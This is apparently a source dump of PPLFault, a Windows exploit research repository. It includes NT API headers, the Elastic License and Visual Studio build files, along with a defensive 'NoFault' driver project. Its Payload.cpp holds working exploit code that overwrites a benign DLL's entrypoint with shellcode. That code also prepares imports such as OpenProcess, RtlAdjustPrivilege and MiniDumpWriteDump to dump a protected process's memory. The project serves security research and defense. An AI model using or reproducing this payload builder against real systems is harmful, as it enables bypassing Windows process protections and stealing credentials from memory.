TRACE_CONTROL_INFORMATION_CLASS; 103 | 104 | #if (PHNT_VERSION >= PHNT_VISTA) 105 | NTSYSCALLAPI 106 | NTSTATUS 107 | NTAPI 108 | NtTraceControl( 109 | _In_ TRACE_CONTROL_INFORMATION_CLASS TraceInformationClass, 110 | _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, 111 | _In_ ULONG InputBufferLength, 112 | _Out_writes_bytes_opt_(TraceInformationLength) PVOID TraceInformation, 113 | _In_ ULONG TraceInformationLength, 114 | _Out_ PULONG ReturnLength 115 | ); 116 | #endif 117 | 118 | #endif 119 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Elastic License 2.0 2 | 3 | URL: 
https://www.elastic.co/licensing/elastic-license 4 | 5 | ## Acceptance 6 | 7 | By using the software, you agree to all of the terms and conditions below. 8 | 9 | ## Copyright License 10 | 11 | The licensor grants you a non-exclusive, royalty-free, worldwide, 12 | non-sublicensable, non-transferable license to use, copy, distribute, make 13 | available, and prepare derivative works of the software, in each case subject to 14 | the limitations and conditions below. 15 | 16 | ## Limitations 17 | 18 | You may not provide the software to third parties as a hosted or managed 19 | service, where the service provides users with access to any substantial set of 20 | the features or functionality of the software. 21 | 22 | You may not move, change, disable, or circumvent the license key functionality 23 | in the software, and you may not remove or obscure any functionality in the 24 | software that is protected by the license key. 25 | 26 | You may not alter, remove, or obscure any licensing, copyright, or other notices 27 | of the licensor in the software. Any use of the licensor’s trademarks is subject 28 | to applicable law. 29 | 30 | ## Patents 31 | 32 | The licensor grants you a license, under any patent claims the licensor can 33 | license, or becomes able to license, to make, have made, use, sell, offer for 34 | sale, import and have imported the software, in each case subject to the 35 | limitations and conditions in this license. This license does not cover any 36 | patent claims that you cause to be infringed by modifications or additions to 37 | the software. If you or your company make any written claim that the software 38 | infringes or contributes to infringement of any patent, your patent license for 39 | the software granted under these terms ends immediately. If your company makes 40 | such a claim, your patent license ends immediately for work on behalf of your 41 | company. 
42 | 43 | ## Notices 44 | 45 | You must ensure that anyone who gets a copy of any part of the software from you 46 | also gets a copy of these terms. 47 | 48 | If you modify the software, you must include in any modified copies of the 49 | software prominent notices stating that you have modified the software. 50 | 51 | ## No Other Rights 52 | 53 | These terms do not imply any licenses other than those expressly granted in 54 | these terms. 55 | 56 | ## Termination 57 | 58 | If you use the software in violation of these terms, such use is not licensed, 59 | and your licenses will automatically terminate. If the licensor provides you 60 | with a notice of your violation, and you cease all violation of this license no 61 | later than 30 days after you receive that notice, your licenses will be 62 | reinstated retroactively. However, if you violate these terms after such 63 | reinstatement, any additional violation of these terms will cause your licenses 64 | to terminate automatically and permanently. 65 | 66 | ## No Liability 67 | 68 | *As far as the law allows, the software comes as is, without any warranty or 69 | condition, and the licensor will not be liable to you for any damages arising 70 | out of these terms or the use or nature of the software, under any kind of 71 | legal claim.* 72 | 73 | ## Definitions 74 | 75 | The **licensor** is the entity offering these terms, and the **software** is the 76 | software the licensor makes available under these terms, including any portion 77 | of it. 78 | 79 | **you** refers to the individual or entity agreeing to these terms. 80 | 81 | **your company** is any legal entity, sole proprietorship, or other kind of 82 | organization that you work for, plus all organizations that have control over, 83 | are under the control of, or are under common control with that 84 | organization. 
**control** means ownership of substantially all the assets of an 85 | entity, or the power to direct its management and policies by vote, contract, or 86 | otherwise. Control can be direct or indirect. 87 | 88 | **your licenses** are all the licenses granted to you for the software under 89 | these terms. 90 | 91 | **use** means anything you do with the software requiring one of your licenses. 92 | 93 | **trademark** means trademarks, service marks, and similar rights. 94 | -------------------------------------------------------------------------------- /phnt/include/ntkeapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Kernel executive support library 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTKEAPI_H 8 | #define _NTKEAPI_H 9 | 10 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 11 | #define LOW_PRIORITY 0 // Lowest thread priority level 12 | #define LOW_REALTIME_PRIORITY 16 // Lowest realtime priority level 13 | #define HIGH_PRIORITY 31 // Highest thread priority level 14 | #define MAXIMUM_PRIORITY 32 // Number of thread priority levels 15 | #endif 16 | 17 | typedef enum _KTHREAD_STATE 18 | { 19 | Initialized, 20 | Ready, 21 | Running, 22 | Standby, 23 | Terminated, 24 | Waiting, 25 | Transition, 26 | DeferredReady, 27 | GateWaitObsolete, 28 | WaitingForProcessInSwap, 29 | MaximumThreadState 30 | } KTHREAD_STATE, *PKTHREAD_STATE; 31 | 32 | // private 33 | typedef enum _KHETERO_CPU_POLICY 34 | { 35 | KHeteroCpuPolicyAll = 0, 36 | KHeteroCpuPolicyLarge = 1, 37 | KHeteroCpuPolicyLargeOrIdle = 2, 38 | KHeteroCpuPolicySmall = 3, 39 | KHeteroCpuPolicySmallOrIdle = 4, 40 | KHeteroCpuPolicyDynamic = 5, 41 | KHeteroCpuPolicyStaticMax = 5, // valid 42 | KHeteroCpuPolicyBiasedSmall = 6, 43 | KHeteroCpuPolicyBiasedLarge = 7, 44 | KHeteroCpuPolicyDefault = 8, 45 | KHeteroCpuPolicyMax = 9 46 | } KHETERO_CPU_POLICY, *PKHETERO_CPU_POLICY; 47 | 48 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 49 | 50 | typedef enum 
_KWAIT_REASON 51 | { 52 | Executive, 53 | FreePage, 54 | PageIn, 55 | PoolAllocation, 56 | DelayExecution, 57 | Suspended, 58 | UserRequest, 59 | WrExecutive, 60 | WrFreePage, 61 | WrPageIn, 62 | WrPoolAllocation, 63 | WrDelayExecution, 64 | WrSuspended, 65 | WrUserRequest, 66 | WrEventPair, 67 | WrQueue, 68 | WrLpcReceive, 69 | WrLpcReply, 70 | WrVirtualMemory, 71 | WrPageOut, 72 | WrRendezvous, 73 | WrKeyedEvent, 74 | WrTerminated, 75 | WrProcessInSwap, 76 | WrCpuRateControl, 77 | WrCalloutStack, 78 | WrKernel, 79 | WrResource, 80 | WrPushLock, 81 | WrMutex, 82 | WrQuantumEnd, 83 | WrDispatchInt, 84 | WrPreempted, 85 | WrYieldExecution, 86 | WrFastMutex, 87 | WrGuardedMutex, 88 | WrRundown, 89 | WrAlertByThreadId, 90 | WrDeferredPreempt, 91 | WrPhysicalFault, 92 | WrIoRing, 93 | WrMdlCache, 94 | MaximumWaitReason 95 | } KWAIT_REASON, *PKWAIT_REASON; 96 | 97 | typedef enum _KPROFILE_SOURCE 98 | { 99 | ProfileTime, 100 | ProfileAlignmentFixup, 101 | ProfileTotalIssues, 102 | ProfilePipelineDry, 103 | ProfileLoadInstructions, 104 | ProfilePipelineFrozen, 105 | ProfileBranchInstructions, 106 | ProfileTotalNonissues, 107 | ProfileDcacheMisses, 108 | ProfileIcacheMisses, 109 | ProfileCacheMisses, 110 | ProfileBranchMispredictions, 111 | ProfileStoreInstructions, 112 | ProfileFpInstructions, 113 | ProfileIntegerInstructions, 114 | Profile2Issue, 115 | Profile3Issue, 116 | Profile4Issue, 117 | ProfileSpecialInstructions, 118 | ProfileTotalCycles, 119 | ProfileIcacheIssues, 120 | ProfileDcacheAccesses, 121 | ProfileMemoryBarrierCycles, 122 | ProfileLoadLinkedIssues, 123 | ProfileMaximum 124 | } KPROFILE_SOURCE; 125 | 126 | #endif 127 | 128 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 129 | 130 | NTSYSCALLAPI 131 | NTSTATUS 132 | NTAPI 133 | NtCallbackReturn( 134 | _In_reads_bytes_opt_(OutputLength) PVOID OutputBuffer, 135 | _In_ ULONG OutputLength, 136 | _In_ NTSTATUS Status 137 | ); 138 | 139 | #if (PHNT_VERSION >= PHNT_VISTA) 140 | NTSYSCALLAPI 141 | VOID 142 | NTAPI 143 | 
NtFlushProcessWriteBuffers( 144 | VOID 145 | ); 146 | #endif 147 | 148 | NTSYSCALLAPI 149 | NTSTATUS 150 | NTAPI 151 | NtQueryDebugFilterState( 152 | _In_ ULONG ComponentId, 153 | _In_ ULONG Level 154 | ); 155 | 156 | NTSYSCALLAPI 157 | NTSTATUS 158 | NTAPI 159 | NtSetDebugFilterState( 160 | _In_ ULONG ComponentId, 161 | _In_ ULONG Level, 162 | _In_ BOOLEAN State 163 | ); 164 | 165 | NTSYSCALLAPI 166 | NTSTATUS 167 | NTAPI 168 | NtYieldExecution( 169 | VOID 170 | ); 171 | 172 | #endif 173 | 174 | #endif 175 | -------------------------------------------------------------------------------- /NoFault/NoFault.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C} 15 | {dd38f7fc-d7bd-488b-9242-7d8754cde80d} 16 | v4.5 17 | 12.0 18 | Debug 19 | Win32 20 | NoFault 21 | 22 | 23 | 24 | Windows10 25 | true 26 | WindowsKernelModeDriver10.0 27 | Driver 28 | WDM 29 | 30 | 31 | Windows10 32 | false 33 | WindowsKernelModeDriver10.0 34 | Driver 35 | WDM 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | DbgengKernelDebugger 47 | 48 | 49 | DbgengKernelDebugger 50 | 51 | 52 | 53 | sha256 54 | 55 | 56 | %(AdditionalDependencies);$(KernelBufferOverflowLib);$(DDK_LIB_PATH)ntoskrnl.lib;$(DDK_LIB_PATH)hal.lib;$(DDK_LIB_PATH)wmilib.lib 57 | /INTEGRITYCHECK %(AdditionalOptions) 58 | 59 | 60 | _DEBUG;_WIN64;_AMD64_;AMD64;%(PreprocessorDefinitions) 61 | $(SolutionDir)/phnt/include;$(IntDir);%(AdditionalIncludeDirectories) 62 | 63 | 64 | 65 | 66 | sha256 67 | 68 | 69 | %(AdditionalDependencies);$(KernelBufferOverflowLib);$(DDK_LIB_PATH)ntoskrnl.lib;$(DDK_LIB_PATH)hal.lib;$(DDK_LIB_PATH)wmilib.lib 70 | /INTEGRITYCHECK %(AdditionalOptions) 71 | 72 | 73 | $(SolutionDir)/phnt/include;$(IntDir);%(AdditionalIncludeDirectories) 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 
-------------------------------------------------------------------------------- /Utils/Utils.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {18110af9-d47e-4e25-991c-53d692cccdde} 17 | Utils 18 | 10.0 19 | 20 | 21 | 22 | StaticLibrary 23 | true 24 | v142 25 | Unicode 26 | 27 | 28 | StaticLibrary 29 | false 30 | v142 31 | true 32 | Unicode 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | true 48 | 49 | 50 | false 51 | 52 | 53 | 54 | Level3 55 | true 56 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 57 | true 58 | $(SolutionDir)/phnt/include 59 | 60 | 61 | Console 62 | true 63 | 64 | 65 | 66 | 67 | Level3 68 | true 69 | true 70 | true 71 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 72 | true 73 | MultiThreaded 74 | $(SolutionDir)/phnt/include 75 | 76 | 77 | Console 78 | true 79 | true 80 | true 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /PPLFault/Payload.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "Payload.h" 6 | #include "DumpShellcode.h" 7 | #include "resource.h" 8 | #include "Logging.h" 9 | #include "PayloadUtils.h" 10 | #include 11 | #include 12 | #include 13 | 14 | // Builds a SHELLCODE_PARAMS struct so our payload can be smaller and simpler 15 | bool InitShellcodeParams( 16 | PSHELLCODE_PARAMS pParams, 17 | DWORD dwTargetProcessId, 18 | PCWCHAR pDumpPath 19 | ) 20 | { 21 | HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll"); 22 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 23 | 24 | if ((NULL == hKernel32) || (NULL == hNtdll)) 25 | { 26 | Log(Error, "Couldn't find kernel32/ntdll? 
What?"); 27 | return false; 28 | } 29 | 30 | pParams->magic1 = MAGIC1; 31 | pParams->magic2 = MAGIC2; 32 | 33 | // User params 34 | pParams->dwTargetProcessId = dwTargetProcessId; 35 | if (wcslen(pDumpPath) >= _countof(pParams->dumpPath)) 36 | { 37 | Log(Error, "Dump path too long: %ws", pDumpPath); 38 | return false; 39 | } 40 | wcsncpy(pParams->dumpPath, pDumpPath, _countof(pParams->dumpPath)); 41 | 42 | // Strings (so we don't have to embed them in shellcode) 43 | strncpy(pParams->szMiniDumpWriteDump, "MiniDumpWriteDump", _countof(pParams->szMiniDumpWriteDump)); 44 | wcsncpy(pParams->szDbgHelpDll, L"Dbghelp.dll", _countof(pParams->szDbgHelpDll)); 45 | 46 | // IAT 47 | // Target process should already have kernel32 loaded, so we can just pass pointers over 48 | pParams->pLoadLibraryW = (LoadLibraryW_t)GetProcAddress(hKernel32, "LoadLibraryW"); 49 | pParams->pGetProcAddress = (GetProcAddress_t)GetProcAddress(hKernel32, "GetProcAddress"); 50 | pParams->pOpenProcess = (OpenProcess_t)GetProcAddress(hKernel32, "OpenProcess"); 51 | pParams->pCreateFileW = (CreateFileW_t)GetProcAddress(hKernel32, "CreateFileW"); 52 | pParams->pTerminateProcess = (TerminateProcess_t)GetProcAddress(hKernel32, "TerminateProcess"); 53 | pParams->pRtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege"); 54 | 55 | if (!pParams->pLoadLibraryW || 56 | !pParams->pGetProcAddress || 57 | !pParams->pOpenProcess || 58 | !pParams->pCreateFileW || 59 | !pParams->pTerminateProcess || 60 | !pParams->pRtlAdjustPrivilege) 61 | { 62 | Log(Error, "Failed to resolve a payload import"); 63 | return false; 64 | } 65 | 66 | return true; 67 | } 68 | 69 | // Build a payload that consists of the given benign DLL with its entrypoint overwritten by our shellcode 70 | bool BuildPayload( 71 | HANDLE hBenignDll, 72 | std::string & payloadBuffer, 73 | DWORD dwTargetProcessId, 74 | PCWCHAR pDumpPath) 75 | { 76 | std::string buf; 77 | LARGE_INTEGER dllSize; 78 | DWORD dwBytesRead = 0; 79 | 
PVOID pEntrypoint = NULL; 80 | DWORD bytesWritten = 0; 81 | SHELLCODE_PARAMS params = { 0, }; 82 | SIZE_T availableSpace = 0; 83 | 84 | // Read entire source file into buffer 85 | SetFilePointer(hBenignDll, 0, NULL, SEEK_SET); 86 | GetFileSizeEx(hBenignDll, &dllSize); 87 | buf.resize(dllSize.QuadPart); 88 | 89 | if (!ReadFile(hBenignDll, &buf[0], dllSize.LowPart, &dwBytesRead, NULL) || 90 | (dwBytesRead != dllSize.QuadPart)) 91 | { 92 | Log(Error, "BuildPayload: ReadFile failed with GLE %u", GetLastError()); 93 | return false; 94 | } 95 | 96 | // Find the entrypoint 97 | pEntrypoint = FindEntrypointVA(buf); 98 | if (!pEntrypoint) 99 | { 100 | return false; 101 | } 102 | 103 | availableSpace = &buf[buf.size()] - (char*)pEntrypoint; 104 | 105 | // Overwrite entrypoint with shellcode embedded in our resource section 106 | if (!WriteShellcode(MAKEINTRESOURCE(RES_PAYLOAD), pEntrypoint, availableSpace, bytesWritten)) 107 | { 108 | return false; 109 | } 110 | 111 | // Create a SHELLCODE_PARAMS and write it after the shellcode 112 | if (!InitShellcodeParams(¶ms, dwTargetProcessId, pDumpPath)) 113 | { 114 | return false; 115 | } 116 | 117 | if (&buf[buf.size() - 1] - (char*)pEntrypoint + bytesWritten < sizeof(params)) 118 | { 119 | Log(Error, "Not enough space for SHELLCODE_PARAMS"); 120 | return false; 121 | } 122 | 123 | // Install SHELLCODE_PARAMS 124 | memcpy(((PUCHAR)pEntrypoint) + bytesWritten, ¶ms, sizeof(params)); 125 | 126 | payloadBuffer = std::move(buf); 127 | 128 | return true; 129 | } 130 | -------------------------------------------------------------------------------- /phnt/include/ntgdi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Graphics device interface support 3 | * 4 | * This file is part of System Informer. 
5 | */ 6 | 7 | #ifndef _NTGDI_H 8 | #define _NTGDI_H 9 | 10 | #define GDI_MAX_HANDLE_COUNT 0xFFFF // 0x4000 11 | 12 | #define GDI_HANDLE_INDEX_SHIFT 0 13 | #define GDI_HANDLE_INDEX_BITS 16 14 | #define GDI_HANDLE_INDEX_MASK 0xffff 15 | 16 | #define GDI_HANDLE_TYPE_SHIFT 16 17 | #define GDI_HANDLE_TYPE_BITS 5 18 | #define GDI_HANDLE_TYPE_MASK 0x1f 19 | 20 | #define GDI_HANDLE_ALTTYPE_SHIFT 21 21 | #define GDI_HANDLE_ALTTYPE_BITS 2 22 | #define GDI_HANDLE_ALTTYPE_MASK 0x3 23 | 24 | #define GDI_HANDLE_STOCK_SHIFT 23 25 | #define GDI_HANDLE_STOCK_BITS 1 26 | #define GDI_HANDLE_STOCK_MASK 0x1 27 | 28 | #define GDI_HANDLE_UNIQUE_SHIFT 24 29 | #define GDI_HANDLE_UNIQUE_BITS 8 30 | #define GDI_HANDLE_UNIQUE_MASK 0xff 31 | 32 | #define GDI_HANDLE_INDEX(Handle) ((ULONG)(Handle) & GDI_HANDLE_INDEX_MASK) 33 | #define GDI_HANDLE_TYPE(Handle) (((ULONG)(Handle) >> GDI_HANDLE_TYPE_SHIFT) & GDI_HANDLE_TYPE_MASK) 34 | #define GDI_HANDLE_ALTTYPE(Handle) (((ULONG)(Handle) >> GDI_HANDLE_ALTTYPE_SHIFT) & GDI_HANDLE_ALTTYPE_MASK) 35 | #define GDI_HANDLE_STOCK(Handle) (((ULONG)(Handle) >> GDI_HANDLE_STOCK_SHIFT)) & GDI_HANDLE_STOCK_MASK) 36 | 37 | #define GDI_MAKE_HANDLE(Index, Unique) ((ULONG)(((ULONG)(Unique) << GDI_HANDLE_INDEX_BITS) | (ULONG)(Index))) 38 | 39 | // GDI server-side types 40 | 41 | #define GDI_DEF_TYPE 0 // invalid handle 42 | #define GDI_DC_TYPE 1 43 | #define GDI_DD_DIRECTDRAW_TYPE 2 44 | #define GDI_DD_SURFACE_TYPE 3 45 | #define GDI_RGN_TYPE 4 46 | #define GDI_SURF_TYPE 5 47 | #define GDI_CLIENTOBJ_TYPE 6 48 | #define GDI_PATH_TYPE 7 49 | #define GDI_PAL_TYPE 8 50 | #define GDI_ICMLCS_TYPE 9 51 | #define GDI_LFONT_TYPE 10 52 | #define GDI_RFONT_TYPE 11 53 | #define GDI_PFE_TYPE 12 54 | #define GDI_PFT_TYPE 13 55 | #define GDI_ICMCXF_TYPE 14 56 | #define GDI_ICMDLL_TYPE 15 57 | #define GDI_BRUSH_TYPE 16 58 | #define GDI_PFF_TYPE 17 // unused 59 | #define GDI_CACHE_TYPE 18 // unused 60 | #define GDI_SPACE_TYPE 19 61 | #define GDI_DBRUSH_TYPE 20 // unused 62 | #define 
GDI_META_TYPE 21 63 | #define GDI_EFSTATE_TYPE 22 64 | #define GDI_BMFD_TYPE 23 // unused 65 | #define GDI_VTFD_TYPE 24 // unused 66 | #define GDI_TTFD_TYPE 25 // unused 67 | #define GDI_RC_TYPE 26 // unused 68 | #define GDI_TEMP_TYPE 27 // unused 69 | #define GDI_DRVOBJ_TYPE 28 70 | #define GDI_DCIOBJ_TYPE 29 // unused 71 | #define GDI_SPOOL_TYPE 30 72 | 73 | // GDI client-side types 74 | 75 | #define GDI_CLIENT_TYPE_FROM_HANDLE(Handle) ((ULONG)(Handle) & ((GDI_HANDLE_ALTTYPE_MASK << GDI_HANDLE_ALTTYPE_SHIFT) | \ 76 | (GDI_HANDLE_TYPE_MASK << GDI_HANDLE_TYPE_SHIFT))) 77 | #define GDI_CLIENT_TYPE_FROM_UNIQUE(Unique) GDI_CLIENT_TYPE_FROM_HANDLE((ULONG)(Unique) << 16) 78 | 79 | #define GDI_ALTTYPE_1 (1 << GDI_HANDLE_ALTTYPE_SHIFT) 80 | #define GDI_ALTTYPE_2 (2 << GDI_HANDLE_ALTTYPE_SHIFT) 81 | #define GDI_ALTTYPE_3 (3 << GDI_HANDLE_ALTTYPE_SHIFT) 82 | 83 | #define GDI_CLIENT_BITMAP_TYPE (GDI_SURF_TYPE << GDI_HANDLE_TYPE_SHIFT) 84 | #define GDI_CLIENT_BRUSH_TYPE (GDI_BRUSH_TYPE << GDI_HANDLE_TYPE_SHIFT) 85 | #define GDI_CLIENT_CLIENTOBJ_TYPE (GDI_CLIENTOBJ_TYPE << GDI_HANDLE_TYPE_SHIFT) 86 | #define GDI_CLIENT_DC_TYPE (GDI_DC_TYPE << GDI_HANDLE_TYPE_SHIFT) 87 | #define GDI_CLIENT_FONT_TYPE (GDI_LFONT_TYPE << GDI_HANDLE_TYPE_SHIFT) 88 | #define GDI_CLIENT_PALETTE_TYPE (GDI_PAL_TYPE << GDI_HANDLE_TYPE_SHIFT) 89 | #define GDI_CLIENT_REGION_TYPE (GDI_RGN_TYPE << GDI_HANDLE_TYPE_SHIFT) 90 | 91 | #define GDI_CLIENT_ALTDC_TYPE (GDI_CLIENT_DC_TYPE | GDI_ALTTYPE_1) 92 | #define GDI_CLIENT_DIBSECTION_TYPE (GDI_CLIENT_BITMAP_TYPE | GDI_ALTTYPE_1) 93 | #define GDI_CLIENT_EXTPEN_TYPE (GDI_CLIENT_BRUSH_TYPE | GDI_ALTTYPE_2) 94 | #define GDI_CLIENT_METADC16_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_3) 95 | #define GDI_CLIENT_METAFILE_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_2) 96 | #define GDI_CLIENT_METAFILE16_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_1) 97 | #define GDI_CLIENT_PEN_TYPE (GDI_CLIENT_BRUSH_TYPE | GDI_ALTTYPE_1) 98 | 99 | typedef struct _GDI_HANDLE_ENTRY 
100 | { 101 | union 102 | { 103 | PVOID Object; 104 | PVOID NextFree; 105 | }; 106 | union 107 | { 108 | struct 109 | { 110 | USHORT ProcessId; 111 | USHORT Lock : 1; 112 | USHORT Count : 15; 113 | }; 114 | ULONG Value; 115 | } Owner; 116 | USHORT Unique; 117 | UCHAR Type; 118 | UCHAR Flags; 119 | PVOID UserPointer; 120 | } GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; 121 | 122 | typedef struct _GDI_SHARED_MEMORY 123 | { 124 | GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; 125 | } GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; 126 | 127 | #endif 128 | -------------------------------------------------------------------------------- /PPLFault.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32802.440 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PPLFault", "PPLFault\PPLFault.vcxproj", "{B2E27B81-83D9-47C6-A27E-94A79D0234D7}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {48DBC3F5-99E0-4904-B83E-58419768F52E} = {48DBC3F5-99E0-4904-B83E-58419768F52E} 9 | {18110AF9-D47E-4E25-991C-53D692CCCDDE} = {18110AF9-D47E-4E25-991C-53D692CCCDDE} 10 | EndProjectSection 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DumpShellcode", "DumpShellcode\DumpShellcode.vcxproj", "{48DBC3F5-99E0-4904-B83E-58419768F52E}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GodFault", "GodFault\GodFault.vcxproj", "{3C206B0D-0725-4D6D-8047-BBCC6D260410}" 15 | ProjectSection(ProjectDependencies) = postProject 16 | {4AC42F11-3B8D-49FC-BD5F-341E42488630} = {4AC42F11-3B8D-49FC-BD5F-341E42488630} 17 | {18110AF9-D47E-4E25-991C-53D692CCCDDE} = {18110AF9-D47E-4E25-991C-53D692CCCDDE} 18 | EndProjectSection 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GMShellcode", "GMShellcode\GMShellcode.vcxproj", 
"{4AC42F11-3B8D-49FC-BD5F-341E42488630}" 21 | EndProject 22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NoFault", "NoFault\NoFault.vcxproj", "{1246CAFF-A3FD-4674-B625-A4E69E15A33C}" 23 | EndProject 24 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Dumper", "Dumper", "{948E50B1-F3D3-4794-B933-82A24F230298}" 25 | EndProject 26 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "GodMode", "GodMode", "{BABFCD68-33E7-45AC-B618-EB8AE29160C8}" 27 | EndProject 28 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Defense", "Defense", "{AC172BF9-B506-4E38-B29E-1B5DE351DAFE}" 29 | EndProject 30 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Utils", "Utils\Utils.vcxproj", "{18110AF9-D47E-4E25-991C-53D692CCCDDE}" 31 | EndProject 32 | Global 33 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 34 | Debug|x64 = Debug|x64 35 | Release|x64 = Release|x64 36 | EndGlobalSection 37 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 38 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Debug|x64.ActiveCfg = Debug|x64 39 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Debug|x64.Build.0 = Debug|x64 40 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Release|x64.ActiveCfg = Release|x64 41 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Release|x64.Build.0 = Release|x64 42 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Debug|x64.ActiveCfg = Debug|x64 43 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Debug|x64.Build.0 = Debug|x64 44 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Release|x64.ActiveCfg = Release|x64 45 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Release|x64.Build.0 = Release|x64 46 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Debug|x64.ActiveCfg = Debug|x64 47 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Debug|x64.Build.0 = Debug|x64 48 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Release|x64.ActiveCfg = Release|x64 49 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Release|x64.Build.0 = Release|x64 50 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Debug|x64.ActiveCfg = Debug|x64 51 | 
{4AC42F11-3B8D-49FC-BD5F-341E42488630}.Debug|x64.Build.0 = Debug|x64 52 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Release|x64.ActiveCfg = Release|x64 53 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Release|x64.Build.0 = Release|x64 54 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Debug|x64.ActiveCfg = Debug|x64 55 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Debug|x64.Build.0 = Debug|x64 56 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Debug|x64.Deploy.0 = Debug|x64 57 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Release|x64.ActiveCfg = Release|x64 58 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Release|x64.Build.0 = Release|x64 59 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Release|x64.Deploy.0 = Release|x64 60 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Debug|x64.ActiveCfg = Debug|x64 61 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Debug|x64.Build.0 = Debug|x64 62 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Release|x64.ActiveCfg = Release|x64 63 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Release|x64.Build.0 = Release|x64 64 | EndGlobalSection 65 | GlobalSection(SolutionProperties) = preSolution 66 | HideSolutionNode = FALSE 67 | EndGlobalSection 68 | GlobalSection(NestedProjects) = preSolution 69 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7} = {948E50B1-F3D3-4794-B933-82A24F230298} 70 | {48DBC3F5-99E0-4904-B83E-58419768F52E} = {948E50B1-F3D3-4794-B933-82A24F230298} 71 | {3C206B0D-0725-4D6D-8047-BBCC6D260410} = {BABFCD68-33E7-45AC-B618-EB8AE29160C8} 72 | {4AC42F11-3B8D-49FC-BD5F-341E42488630} = {BABFCD68-33E7-45AC-B618-EB8AE29160C8} 73 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C} = {AC172BF9-B506-4E38-B29E-1B5DE351DAFE} 74 | EndGlobalSection 75 | GlobalSection(ExtensibilityGlobals) = postSolution 76 | SolutionGuid = {5B643C9D-2874-4864-BDF2-3A8192FA5986} 77 | EndGlobalSection 78 | EndGlobal 79 | -------------------------------------------------------------------------------- /phnt/include/ntpnpapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Plug and Play support 
